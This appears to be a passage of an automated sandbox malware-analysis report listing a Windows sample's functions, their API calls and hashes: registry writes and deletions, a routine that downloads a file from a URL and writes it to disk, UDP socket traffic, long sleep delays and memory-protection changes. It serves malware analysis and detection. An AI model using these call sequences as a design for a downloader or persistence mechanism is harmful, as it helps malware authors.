                                    Function 024259DE Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTickCount.KERNEL32 ref: 02425A24
                                    • GetPrivateProfileStringA.KERNEL32(024A3A44,024A3FBC,00000000,00000000,00000080,024A4014), ref: 02425A50
                                    • lstrlen.KERNEL32(00000000), ref: 02425A5D
                                    • GetTickCount.KERNEL32 ref: 02425A75
                                    • wsprintfA.USER32 ref: 02425AC0
                                    • WritePrivateProfileStringA.KERNEL32(024A3A44,024A3FBC,?,024A4014), ref: 02425AE5
                                    • lstrcpy.KERNEL32(53263431135,00000000), ref: 02425AF7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CountPrivateProfileStringTick$Writelstrcpylstrlenwsprintf
                                    • String ID: 53263431135
                                    • API String ID: 929466507-3709621365
                                    • Opcode ID: abbc00598068727656ca2ed77ec5fb29793cc0b703da1c33899c03c519511aab
                                    • Instruction ID: 7f46f549e485d96fcd535a8cca8c602cc37d2fba210513289eae753b3ec7efb6
                                    • Opcode Fuzzy Hash: abbc00598068727656ca2ed77ec5fb29793cc0b703da1c33899c03c519511aab
                                    • Instruction Fuzzy Hash: A0317472E40115BFDB58CF68D889BE6BBB9FB48300F0089A9F20D97240DE755B998F50
                                    Function 0042E280 Relevance: 13.8, APIs: 9, Instructions: 289COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d8080c9cdc53e414fe258dfeba310651b85faf96530ca5564181054b83993f84
                                    • Instruction ID: 6f09cc2e8a5c93f050f141dbbed22ac61c14368039c309c1f02962e760425d5b
                                    • Opcode Fuzzy Hash: d8080c9cdc53e414fe258dfeba310651b85faf96530ca5564181054b83993f84
                                    • Instruction Fuzzy Hash: DBB19C70704710AFD724DF66D884B2BBBE5BB84744FA0892EF59287390D778E841CB5A
                                    Function 0242B888 Relevance: 13.6, APIs: 9, Instructions: 146networkfilestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0242B8E6
                                      • Part of subcall function 02425B02: GetTickCount.KERNEL32 ref: 02425B50
                                      • Part of subcall function 02425B02: GetTickCount.KERNEL32 ref: 02425B71
                                      • Part of subcall function 02425B02: lstrlen.KERNEL32(0242B8F8,024A400C,00000000,?,?,?,?,0242B8F8,00000000), ref: 02425B83
                                      • Part of subcall function 02425B02: wsprintfA.USER32 ref: 02425B8F
                                    • InternetOpenA.WININET(024A3A50,00000001,00000000,00000000,00000000), ref: 0242B95B
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 0242B98D
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0242B9C2
                                    • InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 0242B9E8
                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000104,00000000), ref: 0242BA30
                                    • CloseHandle.KERNEL32(?), ref: 0242BAA0
                                    • InternetCloseHandle.WININET(00000000), ref: 0242BAB6
                                    • InternetCloseHandle.WININET(00000000), ref: 0242BACC
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$CountOpenTick$CreateReadWritelstrcpylstrlenwsprintf
                                    • String ID:
                                    • API String ID: 999627789-0
                                    • Opcode ID: 1b008bc29fa061237af415750a801d93de689d04edc57aa874f50293704d6231
                                    • Instruction ID: 3aade83b26de2b7a220eb37d17948fb8b9c6b238e42599251d9ce557d7aebf6a
                                    • Opcode Fuzzy Hash: 1b008bc29fa061237af415750a801d93de689d04edc57aa874f50293704d6231
                                    • Instruction Fuzzy Hash: 5E510D71A40628DBDB74CB59DC48BEBB774EB4430AF4085D9E149A6280DBB45BD8CF50
                                    Function 02423D9B Relevance: 13.6, APIs: 9, Instructions: 90sleepthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0242F030: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,024A3A34), ref: 0242F067
                                      • Part of subcall function 0242F030: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,0242232C), ref: 0242F08E
                                    • Sleep.KERNEL32(000493E0,00000001), ref: 02423DFE
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003B41,00000000,00000000,00000000), ref: 02423E78
                                    • Sleep.KERNEL32(00000200), ref: 02423E8C
                                    • Sleep.KERNEL32(00000100), ref: 02423EA0
                                    • Sleep.KERNEL32(00000100), ref: 02423ECA
                                    • Sleep.KERNEL32(00000400), ref: 02423EE2
                                    • Sleep.KERNEL32(00000400), ref: 02423F04
                                    • Sleep.KERNEL32(00249F00,00000000), ref: 02423F21
                                    • RtlExitUserThread.NTDLL(00000000), ref: 02423F2E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$CreateFileThread$ExitMappingUserView
                                    • String ID:
                                    • API String ID: 2742488253-0
                                    • Opcode ID: deb5e7221b345826fd0f7e8935b64962c0ec99a6fbb152eb2b9e749eab01490d
                                    • Instruction ID: eeaf19b7c096d76746e0c2defd2ee654c98ee950993148182d1e44f6c72e4b21
                                    • Opcode Fuzzy Hash: deb5e7221b345826fd0f7e8935b64962c0ec99a6fbb152eb2b9e749eab01490d
                                    • Instruction Fuzzy Hash: 1231A3B0E842289BD724AF52DD497DA7A78BB00706F8044E9E305A61C1DBB41EDDCF69
                                    Function 02422FA0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 192networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WS2_32(00000002,00000002,00000011), ref: 02423008
                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02423072
                                    • select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 0242314A
                                    • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 02423179
                                    • closesocket.WS2_32(?), ref: 024232C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: closesocketrecvfromselectsendtosocket
                                    • String ID: @
                                    • API String ID: 4198204009-2766056989
                                    • Opcode ID: 939c1687e2d323445cdef872dd3756ac67676526bd1b875b406e820770670a76
                                    • Instruction ID: ee0e71fd5acdde34318f8fd0cc3066100f9794dfd91faa7d39850570d2cfe367
                                    • Opcode Fuzzy Hash: 939c1687e2d323445cdef872dd3756ac67676526bd1b875b406e820770670a76
                                    • Instruction Fuzzy Hash: 7F818471D041B88AEB38CF25CD507EABB75AF45310F9041DAE299AA2C0D7B55EC8CF50
                                    Function 024243EC Relevance: 10.6, APIs: 7, Instructions: 94registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.KERNEL32(024253F7,024A47E0,00000000,000F003F,024253F7), ref: 02424408
                                    • RegEnumValueA.KERNEL32(024253F7,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0242443F
                                    • RegDeleteValueA.KERNEL32(024253F7,?), ref: 02424468
                                    • RegEnumKeyExA.KERNEL32(024253F7,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 024244A0
                                    • wsprintfA.USER32 ref: 024244D3
                                    • RegDeleteKeyA.ADVAPI32(024253F7,?), ref: 024244FA
                                    • RegCloseKey.ADVAPI32(024253F7), ref: 02424517
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteEnumValue$CloseOpenwsprintf
                                    • String ID:
                                    • API String ID: 2321319729-0
                                    • Opcode ID: fdf3315c469dec4b9247b4a13c8f593809b4ad3277018d24c2952e5f904a4763
                                    • Instruction ID: 8adf2e1623fdb1e5f4b59e18bc4fb6a6487ee1bfd6be4b245cd8f1fa4af0eb10
                                    • Opcode Fuzzy Hash: fdf3315c469dec4b9247b4a13c8f593809b4ad3277018d24c2952e5f904a4763
                                    • Instruction Fuzzy Hash: 60315EB5E04218EBDB14CF95DC85FDE7BB8AB48704F40C589E709A7180D7749689CF54
                                    Function 0242DC56 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.KERNEL32(80000001,024A3DA8,00000000,000F003F,?,?), ref: 0242DC9D
                                    • RegSetValueExA.KERNELBASE(?,024A3DE4,00000000,00000004,00000002,00000004), ref: 0242DCCB
                                    • RegCloseKey.KERNEL32(?), ref: 0242DCD8
                                    • lstrcpy.KERNEL32(00000000,024A3EAC), ref: 0242DD33
                                    • lstrcat.KERNEL32(00000000,024A3EA4), ref: 0242DD46
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenValuelstrcatlstrcpy
                                    • String ID: >
                                    • API String ID: 1115058322-325317158
                                    • Opcode ID: 7f2c53fe487756f314cc8e4bc19023291af63aeb94268f3940ffa677749e7210
                                    • Instruction ID: 6d09d984c3cdf4a662e4f50db6d5bea1e7542090b9f850983393c6565243c24b
                                    • Opcode Fuzzy Hash: 7f2c53fe487756f314cc8e4bc19023291af63aeb94268f3940ffa677749e7210
                                    • Instruction Fuzzy Hash: 78318FB5D40228DFD728CF55DC44BEABB78EB5A304F0086CAE64E67240D6B55AD8CF90
                                    Function 02423FAA Relevance: 9.2, APIs: 6, Instructions: 175sleepstringthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(0002BF20), ref: 02424036
                                      • Part of subcall function 024213E8: InterlockedExchange.KERNEL32(024340B8,?), ref: 02421406
                                    • Sleep.KERNEL32 ref: 02424055
                                    • lstrcpy.KERNEL32(00000000,?), ref: 0242418D
                                    • Sleep.KERNEL32(010B0023), ref: 024242A0
                                    • Sleep.KERNEL32(001B7740), ref: 024242AD
                                    • RtlExitUserThread.NTDLL(00000000), ref: 024242BA
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$ExchangeExitInterlockedThreadUserlstrcpy
                                    • String ID:
                                    • API String ID: 2174692278-0
                                    • Opcode ID: 6c629858e26bbb83b5ad511687ca18737bda42ed6d019e1a4789feaf22ee7d48
                                    • Instruction ID: a9b54e31f12a9991218a1201b065839ec39996ae084f21274a68af5fc771cf01
                                    • Opcode Fuzzy Hash: 6c629858e26bbb83b5ad511687ca18737bda42ed6d019e1a4789feaf22ee7d48
                                    • Instruction Fuzzy Hash: 047194B1E002388BEF65CB12CC55BBA77B5EF50304F5086EAD609BA280DB755E89CF54
                                    Function 0242DBCC Relevance: 9.1, APIs: 6, Instructions: 54registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.KERNEL32(00000001,?,00000000,000F003F,?), ref: 0242DBEC
                                    • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 0242DC08
                                    • RegCloseKey.ADVAPI32(?), ref: 0242DC12
                                    • RegCreateKeyA.ADVAPI32(00000001,?,?), ref: 0242DC26
                                    • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 0242DC42
                                    • RegCloseKey.ADVAPI32(?), ref: 0242DC4C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseValue$CreateOpen
                                    • String ID:
                                    • API String ID: 2738932338-0
                                    • Opcode ID: 557e21b19fe3974e53e7d9aa315eabc08ebbb1f57adf90ae1c7797b1b5f381ea
                                    • Instruction ID: 7aae818bb8ab65c69d266382e1614039c8b6552bfd3b911e52b5a4378353a292
                                    • Opcode Fuzzy Hash: 557e21b19fe3974e53e7d9aa315eabc08ebbb1f57adf90ae1c7797b1b5f381ea
                                    • Instruction Fuzzy Hash: EE11FEB9A44208FBDB04DF95D945FAF7BB8AB4C700F508548FB059B180D7709A54CF60
                                    Function 024ABCD0 Relevance: 7.7, APIs: 5, Instructions: 207librarymemoryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 024ABE12
                                    • GetProcAddress.KERNEL32(?,024A8FF9), ref: 024ABE30
                                    • ExitProcess.KERNEL32(?,024A8FF9), ref: 024ABE41
                                    • VirtualProtect.KERNEL32(02420000,00001000,00000004,?,00000000), ref: 024ABE8F
                                    • VirtualProtect.KERNEL32(02420000,00001000), ref: 024ABEA4
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                    • String ID:
                                    • API String ID: 1996367037-0
                                    • Opcode ID: ac6431834ee022a4f2fe632cf973ec9b8ce5812b0bc116e568f5dc9ea50d68d7
                                    • Instruction ID: abc26bf0a9901ba8e85afb1f6dd65c2ca0c8e582b83439ce4835246175965c29
                                    • Opcode Fuzzy Hash: ac6431834ee022a4f2fe632cf973ec9b8ce5812b0bc116e568f5dc9ea50d68d7
                                    • Instruction Fuzzy Hash: 4F5129726507524BD7215EB8CCE07A6BBA0EB7122CB1C073AD6E6CB3C6E7945846C760
                                    Function 004327D0 Relevance: 7.7, APIs: 5, Instructions: 196windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindow.USER32(?), ref: 004328AC
                                    • SendMessageA.USER32(?,00008003,00000000,00000000), ref: 004328C3
                                    • GetWindowRect.USER32(?,00000000), ref: 00432915
                                    • GetClientRect.USER32(?,00000000), ref: 0043296D
                                    • GetWindowRect.USER32(?,00000000), ref: 00432991
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: RectWindow$ClientMessageSend
                                    • String ID:
                                    • API String ID: 1071774122-0
                                    • Opcode ID: f992ee65a3bd9c830f53b83f78b51a40afa21b5ee9098508232fd2c1557be94e
                                    • Instruction ID: 7d54b27a729c64df150d3fddaa6057d42cd14d26974f74b0539de85b8a4befdb
                                    • Opcode Fuzzy Hash: f992ee65a3bd9c830f53b83f78b51a40afa21b5ee9098508232fd2c1557be94e
                                    • Instruction Fuzzy Hash: 0461A1B1604351AFC714DF29D980A6FB7E8FF88708F004A1EF98597280DA78ED05CB96
                                    Function 02423B41 Relevance: 7.6, APIs: 5, Instructions: 104threadnetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InterlockedIncrement.KERNEL32(024340C0), ref: 02423B80
                                    • htons.WS2_32(?), ref: 02423BD2
                                      • Part of subcall function 02422FA0: socket.WS2_32(00000002,00000002,00000011), ref: 02423008
                                      • Part of subcall function 02422FA0: sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02423072
                                      • Part of subcall function 02422FA0: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 0242314A
                                    • GetTickCount.KERNEL32 ref: 02423C36
                                      • Part of subcall function 02422FA0: recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 02423179
                                      • Part of subcall function 02422FA0: closesocket.WS2_32(?), ref: 024232C6
                                    • InterlockedDecrement.KERNEL32(024340C0), ref: 02423D01
                                    • RtlExitUserThread.NTDLL(00000000), ref: 02423D09
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Interlocked$CountDecrementExitIncrementThreadTickUserclosesockethtonsrecvfromselectsendtosocket
                                    • String ID:
                                    • API String ID: 1469894868-0
                                    • Opcode ID: f7c19f4455ff5ca6dfb15e4060a58ad1e45bd61acbc1bc546130f54c257714b9
                                    • Instruction ID: 689d6b9c19f117776504fd138e9f4df974e9a3b19983c49d930732b9a5b54ef5
                                    • Opcode Fuzzy Hash: f7c19f4455ff5ca6dfb15e4060a58ad1e45bd61acbc1bc546130f54c257714b9
                                    • Instruction Fuzzy Hash: 5B414875E042A8CBEB24CF21D9557D9BB70BB08300F4085DAE98DA7341DBB59AC8CF65
                                    Function 0242CB2D Relevance: 7.6, APIs: 5, Instructions: 72registrysleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 0242CB75
                                    • RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 0242CBB2
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0242CBDB
                                    • Sleep.KERNEL32(00000100), ref: 0242CC11
                                    • RegCloseKey.ADVAPI32(?), ref: 0242CC2E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesCloseEnumFileOpenSleepValue
                                    • String ID:
                                    • API String ID: 684116133-0
                                    • Opcode ID: 791d3da861a4213daf922dd3f3ff3c9a51d35c2339783c417bd9a6ae154d14d2
